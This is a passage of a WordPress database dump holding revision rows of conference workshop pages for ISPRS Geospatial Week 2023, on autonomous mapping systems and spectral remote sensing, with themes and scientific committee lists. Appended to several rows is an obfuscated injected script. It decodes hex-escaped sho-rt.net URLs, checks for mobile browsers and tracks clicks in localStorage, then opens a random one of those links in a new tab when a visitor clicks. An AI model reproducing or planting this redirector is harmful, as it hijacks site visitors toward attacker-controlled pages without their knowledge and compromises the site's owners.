u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-07 01:22:31','2023-02-07 01:22:31','',3681,'https://gsw2023.com/?p=3888',0,'revision','',0),
(3889,1,'2023-02-07 02:03:40','2023-02-07 02:03:40','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2581\" img_size=\"600x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>IAMS - Intelligent and autonomous mapping systems</strong></span></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will seek contributions covering the developments of autonomous mobile sensing and mapping systems and their use in the next generation of Geospatial applications. This workshop aims to bring together communities keen on developing the next generation of drones and uncrewed platforms in general, such as robotics and computer science.</strong></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The focus will be on the advancements in the algorithms embedded in autonomous platforms navigating in outdoor and confined/indoor spaces. Topics of interest include, but not limited to, the development of real-time drone remote sensing analytics algorithms considering edge/fog/cloud computing, innovative georeferencing techniques, deep learning algorithms for situational awareness and autonomous navigation and exploration, as well as collaborative and swarm SLAM algorithms. Lightweight, energy-efficient, replicable hardware and software solutions and their embedding in larger networks of sensors, are particularly of interest for this workshop. A specific focus will be given to BVLOS solutions and the use of autonomous platforms in urban and rural environments. The Workshops will address different monitoring and surveying applications performed by innovative autonomous platforms such as precision farming, disaster mapping, cultural heritage survey, natural environment, and infrastructure monitoring. </strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"turquoise\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"41\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Drones, ground and underwater autonomous systems</strong></h6>\n</li>\n<li>\n<h6><strong>Autonomous path planning, SLAM, navigation, drone-in-the-box, and VLOS/BVLOS exploration</strong></h6>\n</li>\n<li>\n<h6><strong>Edge, fog, and cloud computing for real-time scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>3D real-time mapping and semantic analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Next-generation autonomous platform applications</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative active and passive sensors embedded on autonomous platforms</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative and swarm platforms for Geospatial applications</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bashar Alsadik, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Costas Armenakis, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>John Ray Bergado, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Filiberto Chiabrando, Politecnico di Torino, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Davide Cucci, Pix4D, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Martina Di Rita, Leica Geosystems, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Diogo Duarte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Markus Gerke, TU Braunschweig, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Diego González Aguilera, University of Salamanca, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Ejia Honkavaara, NLS, Finland</strong></h6>\n</li>\n<li>\n<h6><strong>Phillipp Jende, AIT, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Andreas Kamilaris, CYENS, Cyprus</strong></h6>\n</li>\n<li>\n<h6><strong>Taejung Kim, Inha University, South Korea</strong></h6>\n</li>\n<li class=\"m_-609275506827755887MsoListParagraphCxSpFirst\">\n<h6><span lang=\"EN-US\">Raquel Alves de Oliveira, NLS, Finland</span><u></u></h6>\n</li>\n<li class=\"m_-609275506827755887MsoListParagraphCxSpMiddle\">\n<h6><span lang=\"EN-US\">Juha Röning, University of Oulu, Finland</span><u></u></h6>\n</li>\n<li class=\"m_-609275506827755887MsoListParagraphCxSpLast\">\n<h6><span lang=\"EN-US\">Lorenzo Teppati Losè, Politecnico di Torino, Italy</span></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IAMS - Intelligent and autonomous mapping systems','','inherit','closed','closed','','2580-revision-v1','','','2023-02-07 02:03:40','2023-02-07 02:03:40','',2580,'https://gsw2023.com/?p=3889',0,'revision','',0),
(3890,1,'2023-02-07 02:08:33','2023-02-07 02:08:33','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3859\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong></span></h5>\n<p>&nbsp;</p>\n<p><strong>Spectral remote sensing including hyperspectral, multispectral, thermal sensors onboard satellites, aerial, terrestrial and marine acquisition systems, as well as spectral data analytics is an active research topic in Remote Sensing and Computer Vision. This workshop will bring together experts working in cutting-edge spectral remote sensing systems to discuss recent developments in instrumentation, advanced analytics including artificial intelligence, cloud and edge computing methodologies, and future trends in automated information extraction from spectral data. Its fcus is on methodological research. SpACE will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></p>\n<p><u> </u>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>CHAIRS</strong></span></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"73\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Spaceborne, airborne, terrestrial, marine and mobile multispectral and hyperspectral sensors and data processing</li>\n<li>Thermal remote sensing</li>\n<li>Radiometric, atmospheric and geometric calibration/corrections of spectral and thermal data.</li>\n<li>Spectral unmixing, denoising, dimensionality reduction and compression of hyperspectral and multispectral data</li>\n<li>Processing and analysis of 1D signals, 2D images, 3D hyperspectral cubes and 4D spectral video datasets</li>\n<li>Fusion and harmonization of spectral/thermal data with other modalities (e.g., Lidar, SAR, Acoustic), a priori information, geospatial and multitemporal data</li>\n<li>AI methods for spectral data analysis and understanding</li>\n<li>Deep learning and explainability for spectral data analysis</li>\n<li>Cloud-based frameworks for spectral data analytics</li>\n<li>Edge-computing methods for efficient spectral data processing</li>\n<li>Analysis and applications based on multi-temporal and multi-sensor data</li>\n<li>Evaluation benchmarks for assessing method performance, robustness, explainability, scalability and generalization</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee </strong></h5>\n<ul>\n<li>Konstantinos Karantzalos , WG III/2 Chair</li>\n<li>Daniele Cerra , WG I/3 Chair</li>\n<li>Xinlian Liang, WG II/1 Chair</li>\n<li>Anna Brook (Israel) , WG III/2</li>\n<li>Jean-Louis Roujean , WG III/2</li>\n<li>Ilkka Pölönen , WG III/2</li>\n<li>Mi Wang, WG I/3</li>\n<li>Jose Marcato Junior , WG I/3</li>\n<li>Maria Teresa Melis , WG II/1</li>\n<li>Weishu Gong , WG II/1</li>\n<li>Martin Mokroš , WG II/1</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG III/2 Spectral and Thermal Data Processing and Analytics</li>\n<li>WG I/3 Multispectral, Hyperspectral and Thermal Sensors</li>\n<li>WG III/1 Remote Sensing Data Processing and Understanding</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Special Issue dedicated to the workshop:</strong></h5>\n<p>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to an International Journal (tba). The papers being accepted after the peer-review process of the journal will appear in a Special Issue of that journal dedicated to this workshop.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"3861\" img_size=\"1200x1000\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 